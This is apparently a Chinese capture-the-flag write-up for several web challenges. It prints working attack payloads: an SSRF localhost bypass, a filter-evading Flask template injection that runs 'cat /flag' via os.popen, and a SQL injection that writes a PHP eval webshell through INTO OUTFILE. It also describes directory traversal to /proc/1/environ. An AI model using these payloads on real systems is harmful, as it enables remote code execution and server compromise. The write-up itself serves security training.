目录

ezjs

签到

ezssrf1.0

ezflask

ezrce

ezsql1.0

ezweb

---

ezjs

看到这个，直接访问getflag.php，POS提交score =100000000000

签到

6个小模块，我直接放bp的结果

1

2

3

4

5

6

ezssrf1.0

?url=http:@127.0.1/FFFFF11111AAAAAggggg.php也可以

ezflask

emmmm，我是用fenqing一把嗦的

{{((joiner['__init__']['__globals__']['__builtins__']['__i''mport__']('o''s'))['p''open']('CAT /FLAG'|lower))['read']()}}

ezrce

难点就是如何绕过这个waf

这题可以用时readgzfile

该函数用于输出一个 .gz 文件的内容

但是对于非 gzip 格式的文件，直接读取内容

这里还有一种解法：

我们可以用\符号开头，它不会影响函数的运行

ezsql1.0

outfile

into outfile '/var/www/html/1.php' - 这是SQL的文件写入操作，将查询结果写入到服务器的 /var/www/html/1.php 文件中

fuzz一波，ban了空格，select会被替换成空

空格的话这里%09和/**/都可以绕过

这里是发现有写入的权限

payload：

?id=-1%09union%09seselectlect%091,%27%3C?=eval($_POST[1]);?%3E%27,3%09into%09outfile%09%27/var/www/html/1.php%27#

访问：

直接蚁剑连接：

在/var/db.sql这里找到flag的base64编码后的值

解码即可

ezweb

这题还没有完全掌握，思路是借鉴其他师傅的

账号为fly233

密码是123456789

这里发现有个参数，那就不急着文件上传

发现可以目录便利：

最后在/proc/1/environ找到flag